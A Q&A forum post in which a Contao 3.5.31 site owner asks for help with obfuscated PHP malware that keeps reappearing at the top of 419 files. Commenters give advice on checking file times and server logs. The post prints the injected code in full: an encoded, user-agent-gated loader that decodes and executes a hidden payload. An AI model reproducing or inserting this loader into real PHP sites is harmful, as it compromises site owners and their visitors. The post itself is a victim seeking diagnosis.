# Contao malware PHP Code inside files

Tags: php, malware, contao

I'm running a website on Contao 3.5.31 and I have a problem that I can't figure out...

The problem is that in almost all the files there is a PHP Code on top of the file but it seems that it doesn't affect the website... Maybe some of you have experienced a similar thing or know what that code does...

I cleaned the page 2 weeks ago of all this malware code but now it's again inside the php files

Thats the code:

```
<?php $ueqiklix = ' (strstr($uas,"  x66 151 x72 145 x66 84:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<de:4:|:**#ppde#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjcpV  x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!    x27!hmg%)!gh!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv8]225]241]334]368]322]3]364]6]283]427]36]3#462]47y]252]18y]#>q%<#762EBFI,6<*127-UVPFNJU,6<*27-SFGjA)qj3hopmA    x273qj%6<*Y%)fnbozcYufhA    x272q5  x52 137 x41 107 x45fsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb6,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepf_*#ujojRk3`{666~6<&w6<   x7_map("sggewyk",str_split("%t<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R6:>1<!gps)%j:>1<%j:=tj{fpg)%s:*24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%LDPT7-UFOJ`GB)fubfsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3q56   x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $uas=strtolower($_S    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW&)7gj6<*doj%7-C)fepm%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D)#}#-#  x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   x24)%   x24-    x!|!**#j{hnpd#)tutjyf`opjudovg  x22)!gj}1~!<2p% x7f!~!<##]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjud%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcx7f!<X>b%Z<#opo#>b%!*#5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~uas," x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f 15qnjA  x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~!>!2p%Z<^2  x5c2b%!>!2p%!*3>?*2b%)gpb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/   xt2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`2l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}doF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x  x2w6Z6<.2`hA    x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf  xrfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%76L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285*e  x27,*d  x27,*c  x27,*b  x27)fepdof.)fepdof./#@#/if((function_exists("   x6f 142 x5f 163 !Ydrr)%rxB%epnbss!>!bssbz)#44157    x78"))) { $ngtfrlt = "  x63 162 x65mf!}Z;^nbsbq%    x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+x5c%j^  x24-    x24tvctus)% x24-    x24b!>!%yy73P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43(<!fwbm)%tjw)#    x24#-!#]y38#-!%d>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56Apz)#]341]88M4P8]37]27/   x24)##-!#~<#/%  x24-    x24!>!fyqmpeqp%>5h%!<*::::::-111112)eobs`un>qp%!24- x24*<!  x24-    x24gps)%j>1<%j=tj%6<^#zsfvr#    x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zsfvr# x5cq%*qp%!-uyfu%)3of)fepdof`57ftbc  x7f!|!*uyfu x27k:!ftj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*1    x64")) or (strstr($uas,"    x63 150 x72 157 x6d 145")) orj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)ut:>:8:|:7#6#)tutjyf`439275ttnction sggewyk($n){return c5   x24-    x24-!%  x24-    x24*!|! x24-    x24 24]31#-%tdz*Wsfuvso!%bss    x5csboe))1/35.)1/14+9**-)1/2986+7*)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ft6767~6<Cw6<pd%w6Z6<.5`hA   x27pd%6<pd%w6Z6<.4`hA   x27pd%6<p!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c]321]464]284]364]6]234]342]58]f)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi xfepmqyfA>2b%!<*qp%-*.%)euhA)34985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%{;)gj}l;33bq}k;opjudovg}x;0]=f{jt)!gj!<*2bd%-#1GO   x22#)6]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x24pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepm  141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu    116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (strstr($#p#/%z<jg!)%z>>2*!%z>jm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bub6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6<*)ujojR   x27id%6<    x7fw6*  x7hr(ord($n)-1);} @error_reporting(0); $ambxdxq = implode(array2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!   x27!hmg%)!gj!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SF])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jhOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtof>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f   x27,%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74gvodujpo! x24-    x24y7   x_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%  >%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!d%w6Z6<.3`hA   x27pd%6<pd%#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tec:649#-!#:618d5f9#-!#f6c68399#-!#65egj{fpg)%    x24-    x24*<!~!    x24/%t2wh%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#*^/%rx<~!!%s:N}#-%o:W%c:>1<%bx74   141 x72 164") && (!isset($GLOBALS[" x61 156 x75 1qnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutjw!>!#]y84]275]y83]248]y83]25#>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)323ldfidk!~!<*yfeobz+sfwjidsb`bj+umbg} x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;t0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!:]268]y7f#<!%tww!>!   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%UFH#  x27rfs%6~6< x7fw6<*K27*&7-n%)utjm6< x7fw6*CW&)7g>n%<#372]58y]472]37y]672]48y]#>s%<)ftpmdXA6|7**197-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`E{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9yERVER["    x48 124 x54 120 x5f 125 x53 1024y4  x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*!| x24-    x2vt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<TOBSUOSVUFS,6<*msv%7-MSV,3<!fmtf!%z>2<!%ww2)%w`TW~   x24<!fwbm)%tjw)bssbz%b:>%s: x5c%j:.2^,%b:<!%c:]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT)#P#-#Q#-#B#-#T#-#E#-#Gw:**<")));$szaactk = $ngtfrlt("", $ambxdxq); $szaactk();}}ovg<~    x24<!%o:!>! x242178}527}88:7**^#zsfvr#  x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<;%-qp%)54l} x27;%!<*#}_;#)323ldfi}334}472   x24<!%ff2!>!bssbz)  x24]2%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/fw6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSdcmuoctc'; $nqbrery=explode(chr((585-465)),substr($ueqiklix,(23391-17371),(197-163))); $zvetdpes = $nqbrery[0]($nqbrery[(5-4)]); $xxaezyx = $nqbrery[0]($nqbrery[(13-11)]); if (!function_exists('exnwsac')) { function exnwsac($waalezpb, $zcosqrj,$folevh) { $ajkkzc = NULL; for($lalzqyv=0;$lalzqyv<(sizeof($waalezpb)/2);$lalzqyv++) { $ajkkzc .= substr($zcosqrj, $waalezpb[($lalzqyv*2)],$waalezpb[($lalzqyv*2)+(7-6)]); } return $folevh(chr((51-42)),chr((462-370)),$ajkkzc); }; } $ixetrnggq = explode(chr((257-213)),'2021,38,4748,53,915,70,5400,38,445,21,3559,63,1371,68,2696,56,0,36,2088,38,3506,53,2840,27,3772,61,659,28,4857,29,3430,41,3017,56,4554,24,1809,69,5238,28,2629,67,1878,57,5213,25,5300,61,845,70,403,42,2513,66,5820,67,985,63,1439,51,4000,67,374,29,5541,25,3744,28,633,26,5984,36,4578,36,3308,67,2962,55,4966,42,265,41,1257,49,5491,50,3833,48,220,45,2752,61,3643,46,5361,39,5066,58,1157,55,1490,35,3404,26,3228,29,4365,52,1973,48,2445,36,3881,54,4946,20,3471,35,4801,56,525,62,3073,61,4481,38,1306,22,4886,60,2579,50,2126,62,5887,33,2325,65,2813,27,466,59,106,60,1641,62,166,54,687,65,587,46,1764,45,1703,61,3375,29,4067,69,5008,58,1585,56,5155,58,4194,68,4682,37,5266,34,348,26,1212,45,5787,33,5920,33,2867,36,2188,39,1092,65,5438,53,4458,23,2481,32,4652,30,2411,34,3164,64,1328,43,2059,29,4614,38,1525,60,782,63,4136,58,4417,41,3257,51,4262,66,36,70,1048,44,3689,55,1935,38,5638,68,4328,37,2390,21,306,42,2227,68,3134,30,2903,59,4719,29,752,30,5124,31,5612,26,4519,35,5953,31,3622,21,5566,46,5706,23,3935,65,2295,30,5729,58'); $nufjpfk = $zvetdpes("",exnwsac($ixetrnggq,$ueqiklix,$xxaezyx)); $zvetdpes=$ueqiklix; $nufjpfk(""); $nufjpfk=(555-434); $ueqiklix=$nufjpfk-1; ?>
```

This exact same code exists inside 419 files and I fear if I clean it up it'll happen again.

We already changed all the FTP / DB / Server password and I have no idea what I could to to prevent that from happening

I'd be really greatfull if anyone knows anything about that and could help me

Thank you very much

Alex

Comment: Contao comes with a built-in file editor that (in some versions) allowed users to edit files outside their own folders (although that should be fixed in 3.5.31). There could also be a problem with an installed extension, it only takes one with a security vulnerability to allow someone to edit your files. Check your files' modification times and cross-reference that with your server logs to find out if there were any unusual HTTP requests made around that time (and to which files). Since this is not really a programming question, it should be on [security](https://security.stackexchange.com/).

Comment: Sorry, I lied. Having read the details of the security vulnerability thoroughly this time, the issue with the file editor only allowed users to **view** files, not edit.

Comment: Thank you, I will try to do that but the problem is that my Filezilla / Cyberduck says that the files aren't changed so it's difficult to cross-reference it with my server logs